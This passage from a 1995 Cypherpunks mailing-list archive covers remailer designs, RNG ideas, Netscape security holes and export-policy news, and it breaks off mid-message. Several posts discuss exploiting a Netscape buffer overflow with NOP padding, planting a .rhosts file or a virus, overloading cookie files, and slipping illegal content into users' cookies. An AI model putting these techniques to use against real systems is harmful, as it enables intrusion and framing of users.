Existing remailers chain messages by using a fixed public/secret key pair in each remailer. This leaves them open to after-the-fact compromise from the sender end. If you capture a message as the sender sends it, you can later get the key of the first remailer, and decrypt the first layer. You can then proceed on down the line to the recipient. This creates a motive for an attacker to coerce remailers, and it means the value of the remailers' keys continually increases as more messages are sent.

Instead of using a fixed key, the sender can perform a Diffie-Hellman exchange with the recipient at each point in a message's passage. This eliminates the coercion problem, since there is no permanent key to steal, but allows a corrupt remailer to see where the message is going. If the first remailer is corrupt, the whole path is compromised. The next step is to make sure there is no first remailer.

The sender S generates a message and header requesting mailing to the recipient R. The sender splits it into two pieces using a method that requires both pieces to recover any data. Then he adds a header to each piece requesting remailing to remailer 3. He sends one piece to remailer 1 and one piece to remailer 2. The transmissions are protected by DH exchange and encryption. Remailers 1 and 2 each send their pieces to remailer 3. These transmissions are also protected by DH exchanges. Remailer 3 combines the two pieces, recovers the header requesting remailing to R, and sends the recovered message to R.

       S
      / \
     1   2
      \ /
       3
       |
       R

This approach is secure against after-the-fact coercion or key theft, because there is no persistent key to recover. It is also secure against any one of the three remailers being corrupt. If 3 is corrupt, it sees both pieces as it combines them, and knows they came from 1 and 2, but does not know where 1 and 2 got them from. If 1 is corrupt, it knows that a message from S went to 3, but it has only half of the split message, so it can't find out where 3 sent it to. If any two of the three are corrupt, the path is exposed.

It is possible to add more levels. This one uses seven remailers, and can survive any two being corrupt.

        /S\
       / | | \
      1  2 3  4
       \ / \ /
        5   6
         \ /
          7
          |
          R

Some questions I don't know the answers to: What is the best possible arrangement of remailers, so that the highest percentage of them have to be corrupt before the path is revealed? If any continuous line from S to R is corrupt, the path is revealed. And if any two remailers in a 'triangle' are corrupt, the whole triangle is corrupt. For example, 1 and 2, 1 and 5, or 2 and 5. Is there a better arrangement, reusing some remailers, that allows the message to remain secure with a higher number of corrupt remailers in the path? Mike

From perry at piermont.com Tue Sep 26 22:54:18 1995 From: perry at piermont.com (Perry E. Metzger) Date: Tue, 26 Sep 95 22:54:18 PDT Subject: Yet Another Alarmist TV Show About Child Molesters on the Ne In-Reply-To: Message-ID: <199509270554.BAA17087@frankenstein.piermont.com> That's the weirdest statement about the dialectic I've ever heard -- it bears no resemblance to what the man was talking about whatsoever.
Hegel was discussing a theory of how historical changes occur, not suggesting a way to achieve change. You also have his dates wrong -- 200 years too early. The comment also had nothing whatsoever to do with the topic of this mailing list. .pm "James Caldwell" writes: > On 25 Sep 95 at 0:06, Hroller Anonymous Remailer wrote: > > It's called the Hegelian Diclectic(sp?) first postulated by William > Hegel (an ass) in Germany approx the 1600's as a method for social change > when none could otherwise be achieved. > > > And the trashing will continue. It is the classic scenario. > > Feed the media negative press clips about the entity you wish > > to discredit (here, the Net), e.g.: > > 1. All those pedophiles out to lure your children; > > 2. Big coverage on catching some of those pedophiles; > > 3. First page coverage on breaking Netscape's code with the > > headlines that your sensitive information such as your > > credit card numbers, etc. can be retrieved (ignoring that > > the reason was to show Netscape's poorly structured code > > would allow this and, therefore, preventing it before it > > could happen); > > 4. Expect cryptology to crop up in the Oklahoma bombing trial. > > There have already been articles of those involved having > > allegedly used that *damned* Net to correspond. > >

From jamesd at echeque.com Tue Sep 26 23:16:32 1995 From: jamesd at echeque.com (James A. Donald) Date: Tue, 26 Sep 95 23:16:32 PDT Subject: Fax encryption software Message-ID: <199509270616.XAA16763@blob.best.net> At 09:34 PM 9/26/95 -0700, Jonathan Blake wrote: > > I saw this article in alt.privacy. > > Anybody think the described encryption actually is worth > looking at. > > We are talking about a 72 bit engine that is more than > sufficiently strong for time sensitive general business purposes. Since David does not know the difference between CPU word width and an encryption algorithm, I think it is safe to ignore him.
--------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com

From rjc at clark.net Tue Sep 26 23:19:34 1995 From: rjc at clark.net (Ray Cromwell) Date: Tue, 26 Sep 95 23:19:34 PDT Subject: Wild Idea for RNG Message-ID: <199509270619.CAA11744@clark.net> Ok, so I'm reading a message somewhere and I see a message about algorithmic information theory. Cryptography was recently on my mind and I thought of Chaitin's quote "arithmetic is random" So, why not construct a Turing machine with a large state transition table, input a random program, and get a 1 or 0 bit depending on whether it halts in X number of cycles. You could even get more than 1 bit out of it by measuring how many cycles it takes to halt (if it halts before X) and use the LSB. Is it as secure as the halting problem? (intractable to devise an algorithm used to predict a bit with more than 50% confidence if you knew the state table?) Ok, so it's impractical. So how about this: Grab a picture of the current bitmap on your screen. Run it through a good compression algorithm (say, an arithmetic/Q-coder or one of the LZ schemes). Grab the LSB of every 4th byte or so. If the screen is size 1024*768*8, that's 786432 bytes. Let's assume a 10 to 1 compression ratio = 78643 bytes. Let's assume you take 1 bit from every 10 bytes, that's 983 bits of entropy. The screen will often contain data like: random placement of icons and windows, current time, current applications running, and the data in their windows. If Netscape was running for instance, part of the random bits would come from the bitmap representation of the data in Netscape's window which would depend on the URL being displayed.
-Ray

From don at cs.byu.edu Tue Sep 26 23:22:02 1995 From: don at cs.byu.edu (Donald M. Kitchen) Date: Tue, 26 Sep 95 23:22:02 PDT Subject: Windows MixMaster Client In-Reply-To: <00996F95DAD78CE0.0000381E@sanchez.com> Message-ID: <199509270632.AAA01325@zeezrom.cs.byu.edu> > Does anyone out there have a windows mixmaster client? (or a pointer to one?) There are none. > Also, I am having a LOT of grief trying to get the alpha.c2.org remailer to > work for me... (yes, I have the help files) > Could someone walk me through it? You mean the nym server at alpha.c2.org? It seems to have about a 1 week delay on it... Be sure the reply block that you give it is your own, and that you tell alpha which remailer the reply block goes to. Don

From rjc at clark.net Tue Sep 26 23:26:40 1995 From: rjc at clark.net (Ray Cromwell) Date: Tue, 26 Sep 95 23:26:40 PDT Subject: Coercion-proof remailers (solved?) In-Reply-To: <199509270552.WAA00475@cryptical.adnetsol.com> Message-ID: <199509270626.CAA13654@clark.net> This idea is similar to an approach I posted a month or so ago entitled "anonymous name resolution" which uses Shamir sharing to break up the recipient's address so that there is no first remailer to coerce. The idea is that you should not deliver to e-mail addresses on the remailer network, but to "handles"; these handles will be distributed across a DNS-like system that splits up the handles using Shamir sharing. No server stores the handle->email mapping, but the whole network can perform the mapping. Remailers don't deliver the message to the final destination, but deliver pieces of the message to the anonymous name resolver network which perform the final delivery.
-Ray From frogfarm at yakko.cs.wmich.edu Wed Sep 27 00:12:22 1995 From: frogfarm at yakko.cs.wmich.edu (Damaged Justice) Date: Wed, 27 Sep 95 00:12:22 PDT Subject: Cypherpunks Lite In-Reply-To: <199509262133.OAA21492@comsec.com> Message-ID: <199509270704.DAA10591@yakko.cs.wmich.edu> Eric Blossom writes: > I provide a moderated version of the Cypherpunks list called > "Cypherpunks Lite".[...] I offer a similar service, with the following provisos: o There's no fee (unless you want to donate ecash) o No digest format available o Approximately the same statistics as Cpunks Lite (5-10% of all incoming messages, depending on content) o No archives of previous mailings available for public review to aid in consumer choice I call it "Cpunks Frog Forwards". To be added or removed, send a polite request to the human behind this address. -- http://yakko.cs.wmich.edu/~frogfarm ...for the best in unapproved information To be a skeptic is to refuse to be a victim. "This is my .sig. There are many like it, but this one is mine." Freedom...yeah, right. From stewarts at ix.netcom.com Wed Sep 27 00:36:08 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Wed, 27 Sep 95 00:36:08 PDT Subject: Hack Microsoft At Work Fax? Message-ID: <199509270735.AAA23328@ix5.ix.netcom.com> I've been helping a client install Microsoft Windows for Workgroups, which comes with Microsoft At Work Fax. The fax software, in addition to doing normal stuff, lets you encrypt faxes with passwords or public-key encryption for sending to other people who use the same software. The manual has minimal technical information, so I don't know the algorithms it uses; it mostly talks about what GUI buttons to push. I was hoping the section on taking your software overseas would say something about Export Laws and International Arms Traffickin' (and creatin' a disturbance...) but all it said was how to set the international-direct-dialing phone codes so you can get your fax to go where you want. 
Because of that, I'm guessing it's something like RC4/40 and RSA-512 with some sort of user name as part of the public key field, but I'd like to know more, and I'm also guessing that they've got some sort of general export license permission from the Feds. The public-key system uses a public key file with "154 computer-generated characters", and recommends exchanging public keys by floppy disk. I don't know if that's 154*8 bits, or 154*6 or *4, or if there's a user-name string using up some of those characters; probably the latter since it's probably 512 bits because of export. I called the usually helpful Microsoft Technical Support phone number, and they were friendly and will try to get back to me, but this is way out of the scope of the kind of questions they're used to :-) And the stuff I could find from the Web page or ftp.microsoft.com on encryption had less than the manual, plus some stuff on password encryption, plus some stuff on their RAS remote network access stuff which apparently uses DES as well as standard PPP handshaking or Shiva handshaking. Does anybody have any more information? It'd be fun to hit up Microsoft for the next crack if it's weak enough; the fax stuff can also be sent by MSMail so there is eavesdropping potential. #--- # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From jsw at netscape.com Wed Sep 27 00:45:16 1995 From: jsw at netscape.com (Jeff Weinstein) Date: Wed, 27 Sep 95 00:45:16 PDT Subject: netscape NSRANDFILE compatible with /dev/random ? In-Reply-To: Message-ID: <9509270040.ZM150@tofuhut> On Sep 27, 8:32am, Frank A Stevenson wrote: > Subject: netscape NSRANDFILE compatible with /dev/random ? > > What happens if NSRANDFILE is set to /dev/random ? > will netscape try to read an infinite number of random bytes ? In the current patch it will read up to 1 megabyte before stopping. In 2.0 I will add a way to specify a size. 
As a temporary hack you could use 'dd' to get the number of bytes you want into a file, then remove the file once netscape had started up. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine.

From frank at funcom.no Wed Sep 27 00:50:40 1995 From: frank at funcom.no (Frank A Stevenson) Date: Wed, 27 Sep 95 00:50:40 PDT Subject: netscape NSRANDFILE compatible with /dev/random ? In-Reply-To: <9509261428.ZM150@tofuhut> Message-ID: What happens if NSRANDFILE is set to /dev/random ? will netscape try to read an infinite number of random bytes ? > ... > do it. Instead of reading ~/.pgp/randseed.bin, we now get the name > of a file from the environment variable NSRANDFILE, and pass that > file's contents through the RNG seed hash. If you decide that it's > safe, you can set the env variable to point to your randseed.bin file, > or any other file of random bits you care to use. > ... > Netscape Communication Corporation > jsw at netscape.com - http://home.netscape.com/people/jsw > Any opinions expressed above are mine. Frank

From aleph1 at dfw.net Wed Sep 27 00:50:58 1995 From: aleph1 at dfw.net (Aleph One) Date: Wed, 27 Sep 95 00:50:58 PDT Subject: getting netscape to support the remailers In-Reply-To: <199509261957.MAA20143@infinity.c2.org> Message-ID: As far as I can tell from Netscape's web pages and the Java mailing lists the only way to add to the runtime is with DLLs. Java is only being used for applets. And whatever they may say their scripting language is not Java. (An engineer at Sun that worked on getting Java to work for Netscape said that Sun had nothing to do with that half-cooked scripting language). I for once can wait till HotJava is more stable. You can modify it to your heart's content. And learning Java is easy enough.
Aleph One / aleph1 at dfw.net http://underground.org/ KeyID 1024/948FD6B5 Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01 On Tue, 26 Sep 1995, sameer wrote: > That was what I was thinking as well. I am confused by > Netscape's java support though.. I haven't seen very many details. Is > netscape going to only support applets or can you add stuff to the > runtime as well? In order to use jcrypt one needs access to add stuff > to the runtime I believe. >

From aleph1 at dfw.net Wed Sep 27 01:21:32 1995 From: aleph1 at dfw.net (Aleph One) Date: Wed, 27 Sep 95 01:21:32 PDT Subject: [NOISE] Re: Easter Eggs In-Reply-To: <199509261959.MAA28501@desiree.teleport.com> Message-ID: Actually there is a limit of 20 cookies per web server. I will have to check to see if there is a limit on the size of the cookie. And no you don't need a Netscape server. It's just another HTTP header. What about this: downloading an encoded picture containing a graphic description of sex with minors. Would the FBI go around checking people's cookie files and busting them? Aleph One / aleph1 at dfw.net http://underground.org/ KeyID 1024/948FD6B5 Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01 On Tue, 26 Sep 1995, Alan Olsen wrote: > obNetscapeHack: There is a feature called a "cookie file" in Netscape that > is ripe for exploitation as a security leak. If you are using a Netscape > server (and you may not even need that), you can feed all sorts of > information into it without the user's knowledge. I have heard of one page > that overloads the cookie file until the machine runs out of drive space. I > am sure that there are other exploitable holes there... Any takers?
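The defensive side of the cookie-file overload Alan describes, added here as an example that is not code from either post: a minimal client cookie jar that enforces the 20-cookies-per-server limit Aleph One mentions, so a server that keeps sending Set-Cookie headers evicts its own old cookies instead of growing the file. The 4096-byte per-cookie cap and 300-cookie global cap are assumptions, not figures from the thread.

```javascript
// Added example (not from the original posts). A cookie jar that bounds
// what any one server, and all servers together, can make the client store.

const MAX_COOKIES_PER_HOST = 20;  // limit stated in the post
const MAX_COOKIE_BYTES = 4096;    // assumed: cap on one "name=value" pair
const MAX_COOKIES_TOTAL = 300;    // assumed: cap across all hosts

class CookieJar {
  constructor() {
    this.byHost = new Map(); // host -> Map(name -> { value, setAt })
    this.clock = 0;          // monotonic counter for oldest-first eviction
  }

  // Take the name=value part of one Set-Cookie header; attributes such as
  // Path or Expires are ignored here. Returns null for a malformed header.
  static parseSetCookie(header) {
    const pair = header.split(';')[0];
    const eq = pair.indexOf('=');
    if (eq <= 0) return null;
    return { name: pair.slice(0, eq).trim(), value: pair.slice(eq + 1).trim() };
  }

  total() {
    let n = 0;
    for (const jar of this.byHost.values()) n += jar.size;
    return n;
  }

  count(host) {
    const jar = this.byHost.get(host);
    return jar ? jar.size : 0;
  }

  // Delete the oldest cookie in `jar`, or in the whole store when `jar` is
  // undefined. A flood of new cookies therefore recycles space rather than
  // consuming disk.
  evictOldest(jar) {
    let oldest = null;
    const scan = (j) => {
      for (const [name, c] of j) {
        if (!oldest || c.setAt < oldest.c.setAt) oldest = { j, name, c };
      }
    };
    if (jar) scan(jar); else for (const j of this.byHost.values()) scan(j);
    if (oldest) oldest.j.delete(oldest.name);
  }

  // Store one Set-Cookie header received from `host`. Returns true if the
  // cookie was stored, false if it was rejected (malformed or oversized).
  store(host, header) {
    const c = CookieJar.parseSetCookie(header);
    if (!c) return false;
    if (c.name.length + 1 + c.value.length > MAX_COOKIE_BYTES) return false;
    if (!this.byHost.has(host)) this.byHost.set(host, new Map());
    const jar = this.byHost.get(host);
    if (!jar.has(c.name)) {                      // overwrite never grows the jar
      while (jar.size >= MAX_COOKIES_PER_HOST) this.evictOldest(jar);
      while (this.total() >= MAX_COOKIES_TOTAL) this.evictOldest();
    }
    jar.set(c.name, { value: c.value, setAt: this.clock++ });
    return true;
  }
}

// Constructed scenario: a single (hypothetical) host answers with `n`
// distinct cookies, as the overloading page would. Returns how many the
// jar actually holds for that host afterwards.
function floodDemo(n = 1000) {
  const jar = new CookieJar();
  for (let i = 0; i < n; i++) jar.store('evil.example', `c${i}=${'x'.repeat(100)}`);
  return jar.count('evil.example');
}
```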
From anonymous-remailer at shell.portal.com Wed Sep 27 01:49:30 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Wed, 27 Sep 95 01:49:30 PDT Subject: testab Message-ID: <199509270848.BAA14286@jobe.shell.portal.com> testab

From anonymous-remailer at shell.portal.com Wed Sep 27 01:50:57 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Wed, 27 Sep 95 01:50:57 PDT Subject: testab Message-ID: <199509270849.BAA14441@jobe.shell.portal.com> testab

From cwe at it.kth.se Wed Sep 27 02:15:13 1995 From: cwe at it.kth.se (Christian Wettergren) Date: Wed, 27 Sep 95 02:15:13 PDT Subject: Exchange random numbers (was: Re: netscape's response) In-Reply-To: <199509252031.NAA15134@quito.CS.Berkeley.EDU> Message-ID: <199509270913.KAA17943@piraya.electrum.kth.se> | > Giving out contribution: | > MD5(select_bits(my_seed, start_bit, stop_bit)) -> remote | > Taking in contribution : | > my_seed = my_seed XOR | > ((select_low_bits(remote_contrib, contrib_width) << contrib_area) | > | | People seem to think this kind of thing is obviously safe. I'm not yet | convinced. Well, I'm not either, actually. But I think this might be better than the current state of affairs, where every bit of your seed is almost guessable. And it might also be an intermediate solution until there is a good random seed hardware generator in every computer. | By xoring in a quantity *chosen by your adversary*, you're essentially | allowing related-key attacks on your stream cipher. (Your PRNG is just | a stream cipher, keyed with my_seed.) I think you mustn't allow any external partner to "contribute" at a known and/or chosen offset into the buffer. You mustn't accept "too much" contribution either. | No one knows how secure most ciphers are against related-key attacks: | related-key attacks are known to be very powerful (often more powerful | than any other type); but very little research on this topic is available.
| You're treading on unknown ground. Yes. But I wonder whether this isn't really about the battle between "the pragmatists" vs "the purists" point of view wrt security? I see so many very unsophisticated attacks out there that a related-key attack, although possible and powerful, still is rather unlikely. Could you quantify how powerful a related-key attack is, compared to some other kind of attack? I don't know anything about this kind of attack, do you have any references? | There's also a small error in your specific algorithm. Let | n = stop_bit - start_bit; | presumably n is much less than the length of your seed. Then a brute-force | search over n bits will recover n bits of the seed -- this is a much faster | cryptanalysis than a brute force over all bits of the seed. This can | probably be fixed by something like | MD5(select_bits(MD5(my_seed))) -> remote, | but the related-key uncertainties still remain. Ok, noted. Maybe I should try to write down this "idea" for a proper review? Hmmm. /Christian

From rjc at clark.net Wed Sep 27 02:21:27 1995 From: rjc at clark.net (Ray Cromwell) Date: Wed, 27 Sep 95 02:21:27 PDT Subject: WSJ on Netscape Hole 3 In-Reply-To: <199509260102.NAA09663@bats.comp.vuw.ac.nz> Message-ID: <199509270920.FAA19713@clark.net> Matthew Sheppard writes: > sameer writes: > > He's -asking- for an exploit. Tshirts to Ray and the person who > > does the exploit, if it gets written. Maybe I should just ring up 8lgm and > > have them do one. > > It isn't simple, you need to know the absolute address of where the > supplied code will be and alter the return address on the stack to > that address.
> With Netscape 1.1 the state of the stack is much more dynamic, in
> particular the user can be viewing documents at an arbitrary depth in
> the "web tree", each recursion will increase the stack pointer (or
> decrease with some architectures). There is no way of knowing for
> certain where your code will end up and thus no way to reliably alter
> the return address on the stack to execute your arbitrary code.

Are you sure that Netscape uses an implicit stack for this, rather than
an explicit stack? If they use an explicit stack for the "web tree", then
your argument doesn't apply. In fact, I guess that they do use an
explicit stack, because it makes implementing the "History" menu which
shows the last couple of links much easier. I guess that they use some
sort of "ring" structure which is a dequeue or plain array, so that after
a certain "depth", states are written over and "scrolled off".

Also, if they used an implicit stack, all it would do is increase the
uncertainty of where the stack pointer is. However, by inserting enough
NOPs into the exploit code, you can virtually ensure the exploit code
will be executed. Even if you are off by 64kbytes, you can insert
64kbytes of nops which isn't much. My own testing doesn't bear out your
theory. I rarely changed the position of the overflowed stack frame by
more than 200 (after following 3 nested links to my exploit link). I
included 256-512 nops before my exploit code.

> You could always gamble on popular states, like when the first url
> fetched by the browser. Also you could direct execution to any
> routine in the netscape binary (with unknown arguments). The most
> detrimental offhand would be deleting the bookmarks file (whoopee) And
> with Netscape 2 coming RSN I wouldn't waste too much time.

How about creating a .rhosts file with your name in it? Or, on Windows
machines, inserting a virus?
If an exploit is possible, any exploit is probable, given that a clever
encoding of assembly instructions can be created for any code required.

-Ray

From rjc at clark.net Wed Sep 27 02:37:36 1995
From: rjc at clark.net (Ray Cromwell)
Date: Wed, 27 Sep 95 02:37:36 PDT
Subject: getting netscape to support the remailers
In-Reply-To: <9509261805.AA22239@cs.umass.edu>
Message-ID: <199509270937.FAA20543@clark.net>

> sameer writes:
> > I think that in order to get netscape to support the remailers
> > the remailers will have to:
> >
> > A) Support S/MIME
> > B) Have a documented protocol, MIME-related
> >
> > Did Ray Cromwell do some work towards MIMEifying the
> > remailers? My impression of his work back when he posted was that it
> > trusted the remailers too much, but perhaps my memory is flawed-- in
> > any case his work may be helpful towards developing a remailer
> > standard, which could then help get support incorporated into
> > MIME agents.

Yes, a while ago I was working on this, but I dropped it as people
didn't seem interested. It was part of my whole "Remailer 2.0" proposal
(before mixmaster was written). I was studying ways to make it easier
for mail readers to interact with remailers, in particular, messages
which were split, padded, packetized, and sent along separate chains.
All this without some kind of special client. I wanted to use the
multipart/partial part of MIME to have the pieces combined at the
recipient end and decoded using an application/remailer or
application/pgp type. (This was also before PEM was worked on.) So I
had a lot of work to do in standardizing stuff.

I started working on a remailer which combined those facets, and also

1) a remailer network which had strong authentication between remailers
   so that untrusted remailers could not get in the network (web of
   trust for remailers)
2) my virtual handle idea
3) strict addressing for virtual handles on the remailer network (e.g.
   set up an explicit chain to anonymous bob by mailing to
   remailer1#remailer2#....#remailerN#anonymous_bob. Also, if you add a
   '*' in the path, it means for the remailer to choose a random
   remailer as the next in the chain)
4) padding, packetizing, delayed delivery, creating artificial traffic
   to thwart traffic analysis
5) a built in keyserver and "list of active remailers" server. The list
   of active remailers server would also contain flags for each remailer
   detailing what it supports and special flags like if the machine is
   multiuser, single, firewalled, offline (UUCP connection only), etc.
   I wanted as standard, that every remailer could serve keys or at
   least tell you what other remailers were active
6) socket connection for commanding the remailer so that you can bypass
   sendmail logging and get error/status on the message
7) direct SMTP delivery bypassing local sendmail logging

I wanted to use multipart MIME to allow remailers in a network to be run
from user accounts in such a way that they wouldn't accidentally get
mail intended for the remailer and they wouldn't have to bear
responsibility for the mail sent (only the whole machine would, as it
would be delivered via SMTP direct, not sendmail, so no local logs).

Nevertheless, like many things, I completed about 60% of it and it got
put on the back burner never to emerge. Mixmaster came along and I
figured there's no point continuing.

-Ray

From frissell at panix.com Wed Sep 27 03:20:22 1995
From: frissell at panix.com (Duncan Frissell)
Date: Wed, 27 Sep 95 03:20:22 PDT
Subject: cypherpunks press releases/contact list
In-Reply-To: <199509262341.TAA16602@frankenstein.piermont.com>
Message-ID: 

On Tue, 26 Sep 1995, Perry E. Metzger wrote:

> Who gives a damn, anyway? It's not as though we have a "cypherpunks"
> reputation to uphold.

I don't know about that. If you read the three WSJ stories on the
Netscape holes, you find that "Cypherpunks" moves closer to the lead
'graphs each time. Soon we'll be the lead.
DCF

"It is to be hoped *not* in a story about major Fibbie crypto busts."

From jya at pipeline.com Wed Sep 27 04:52:01 1995
From: jya at pipeline.com (John Young)
Date: Wed, 27 Sep 95 04:52:01 PDT
Subject: HP KEscrew
Message-ID: <199509271151.HAA03534@pipe4.nyc.pipeline.com>

The Wall Street Journal, Sept 27, 1995

Hewlett Lobbies for Its Encryption Plan That Would Satisfy Tough Export Rules

By Don Clark

Hewlett-Packard Co. is pushing an unusual plan to protect electronic
transactions around the world without running afoul of U.S. export laws.

The Palo Alto, Calif., computer maker said it has been lobbying
government agencies for more than a year to gain support for its
proposal, which uses a data-scrambling technology to protect
transactions from tampering or theft of data. Strong encryption
technologies ordinarily fall under tough export rules that limit
technologies which could impede U.S. wire-tapping capabilities, a
source of continuing friction between the government and
high-technology companies.

H-P, in a plan developed with the French company Gemplus SCA, wants to
split the code-making technologies into two pieces that would be
approved under different government standards. One device, which could
fit in a standard computer, would contain a basic encryption capability
that is designed to be broadly exported without the need to seek a
separate export license for each foreign user.

Would Help Industry

That device, dubbed an encryption engine, would be useless without the
addition of another tiny piece of hardware that contains a code-making
formula set at a specific strength. The second device, called a policy
card, would be separately reviewed by the U.S. State Department for
each customer. Government agencies, including codebreakers at the
National Security Agency, would still have a say over the strength of
encryption exports.
But customers could build commercial applications around the proposed
encryption engine, knowing that it will work with any code-making
formula that governments might adopt in the future. Now they run the
risk that their work will become obsolete amid policy changes in
Washington, D.C., and other countries.

State Department officials weren't immediately available for comment.
Stewart Baker, a former NSA general counsel who now practices law in
Washington, D.C., termed the H-P plan a clever answer to the problem of
shifting government policy.

"There was a lot of skepticism when H-P first proposed it," said Lynn
McNulty, a former encryption specialist at the National Institute of
Standards and Technology. "But it looks to me that they are well on the
way to the next step."

H-P Confident of Approval

Doug McGowan, an H-P manager involved with the project, said he expects
to receive U.S. approval by next year to begin shipping the encryption
engine freely to Western Europe and Canada. "We believe we will receive
relaxed export controls," he said.

H-P's plan fits some of the NSA's objectives. For one thing, its
technology embeds encryption technology in microchips that can't easily
be modified by computer hackers or terrorists. H-P's policy cards also
could be adapted for a controversial Clinton administration proposal
called key escrow, in which mathematical keys to break codes could be
stored for later use by law enforcement or intelligence agencies, Mr.
McGowan said.

The plan complements a parallel H-P effort to develop a new generation
of "smart" data cards to let consumers buy goods and services around
the world electronically. Gemplus, a huge supplier of credit and debit
cards in Europe, is supplying technology to that effort along with
Informix Corp., a database software maker in Menlo Park, Calif. Jeff
Hudson, an Informix vice president, said the partners' proposed cards
could store money and a database's worth of personal information, such
as medical records.
That approach could eliminate the need to connect to multiple companies
or agencies to manage such information, since it would be stored on
each card, the companies said.

[End]

From jya at pipeline.com Wed Sep 27 05:03:00 1995
From: jya at pipeline.com (John Young)
Date: Wed, 27 Sep 95 05:03:00 PDT
Subject: SSTarget
Message-ID: <199509271202.IAA04464@pipe4.nyc.pipeline.com>

The Wall Street Journal, Sept 27, 1995

Microsoft and Visa Expected to Unveil Internet Technology

By a WSJ Staff Reporter

New York -- Microsoft Corp. and Visa International are expected to
disclose details today of their technology for protecting commerce on
the Internet.

The software company and bank clearinghouse have been working since
last November on a plan for protecting credit-card numbers and other
financial data from crooks, a major obstacle to the widespread use of
computer networks for buying goods and services.

As the largest players in software and credit cards, Microsoft and Visa
wield considerable clout among a crowd of companies vying to set
electronic-security standards. Their proposed specification, called
Secure Transaction Technology, or STT, is partly based on a
data-encryption technology popularized by RSA Data Security Inc., a
closely held company in Redwood City, Calif.

Other key players in the Internet-security race include MasterCard
International Inc., the other name in bank cards, and Netscape
Communications Corp., a leader in Internet software that has suffered
some highly publicized security lapses lately. MasterCard announced
plans to collaborate with Visa on security technology in June, but
isn't expected to take part in the latest Visa-Microsoft announcement.
[End]

From m5 at dev.tivoli.com Wed Sep 27 05:13:44 1995
From: m5 at dev.tivoli.com (Mike McNally)
Date: Wed, 27 Sep 95 05:13:44 PDT
Subject: Netscape Stock Prices
In-Reply-To: 
Message-ID: <9509271213.AA10200@alpha>

Robert Hettinga writes:
 > 
 > > >950809  75.000  53.750  55.500  3851.8
 > > :
 > > :
 > > >950925  69.000  62.250  67.000   684.0   WSJ article re: overflow bug
 > 
 > Actually, Netscape is still the only game in town as far as Wall Street
 > goes.

And of course the fact that a bug in the software is Big News only makes
things better. I never see any WSJ articles about *my* bugs.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5 at tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX     |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From herbs at interlog.com Wed Sep 27 05:18:34 1995
From: herbs at interlog.com (Herb Sutter)
Date: Wed, 27 Sep 95 05:18:34 PDT
Subject: Wild Idea for RNG
Message-ID: <199509271218.IAA07658@gold.interlog.com>

Warning: I'm no expert, my response is just a semi-informed opinion
(emphasis on "semi-").

At 02:19 1995.09.27 -0400, Ray Cromwell wrote:
>So, why not construct a turing machine with a large state transition
>table, input a random program, and get a 1 or 0 bit depending on
                ^^^^^^
>whether it halts in X number of cycles. You could even get more
>than 1 bit out of it by measuring how many cycles it takes to halt
>(if it halts before X) and use the LSB. Is it as secure as
>the halting problem? (intractable to devise an algorithm used
>to predict a bit with more than 50% confidence if you knew the
>state table?)

Your randomness will depend on the prior randomness of your original
input... and if you already have that, the TM won't give you any
additional randomness (rather, this approach will just take all the
randomness you give it and reduce it to 1 bit of randomness, losing all
the rest).
On the other hand, if the 'random' program is not already truly random,
then you may well have patterns in the bits generated by the halting
observation. For instance, if you use a known PRNG to get your "random"
programs, then given the same seed you will end up with the same
programs (and therefore the same resulting 'random' bits from the TM
halting output)... which, in other words, gains you nothing AFAICS over
simply using the PRNG's output directly, except of course that it
exercises your CPU. :-) The attacker still only needs to figure out the
seed.

>Grab a picture of the current bitmap on your screen. Run it through
>a good compression algorithm (say, an arithmetic/Q-coder or
>one of the LZ schemes). Grab the LSB of every 4th byte or so.
>If the screen is size 1024*768*8, that's 786432 bytes. Let's assume
>a 10 to 1 compression ratio = 78643 bytes. Let's assume you take
>1 bit from every 10 bytes, that's 983 bits of entropy.
>
>The screen will often contain data like:
>
>random placement of icons and windows

Not on my machine (or most others, I'd wager)! I thought about this,
and whenever I'm running Netscape (for instance) my screen is probably
identical over 50% of the time because I tend to have the same things
open when I run a given program. Even in the general case, consider
that most people have a preferred desktop layout (in Windows, they have
ProgMan sitting in one place on the screen with usually the same groups
visible/open)... not only will that piece of the screen bitmap not give
you any randomness from one run to the next, but unless you go looking
for "things that haven't changed since last time" your program won't
even know what's reducing your randomness.

>current time

Better, but be careful how you use it; that's what Netscape thought
too. :-)

>current applications running, and the data in their windows
>
>
>If Netscape was running for instance, part of the random bits
>would come from the bitmap representation of the data in Netscape's
>window which would depend on the URL being displayed.

This sounds a bit better... except, of course, that when you initiate a
secure session in Netscape with a specific party/server, your screen
has a very good chance of looking the same each time you connect with
that entity because it is the same URL. :-)

Would someone who's more informed please correct my analysis?

Thanks in advance,

Herb

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Herb Sutter                  2228 Urwin, Suite 102        voice (416) 618-0184
Connected Object Solutions   Oakville ON Canada L6L 2T2   fax   (905) 847-6019

From bigmac at digicash.com Wed Sep 27 05:28:04 1995
From: bigmac at digicash.com (Marcel van der Peijl)
Date: Wed, 27 Sep 95 05:28:04 PDT
Subject: NO weak links in DigiCash system!!!
Message-ID: <199509271227.NAA14451@digicash.com>

> I have a couple of problems/complaints with your ecash project.
> When I was sent my Acct ID and Passwd they were sent to me plain text
> instead of being PGP-encrypted first. This means that some malicious
> hacker could have intercepted the e-mail message and stolen the
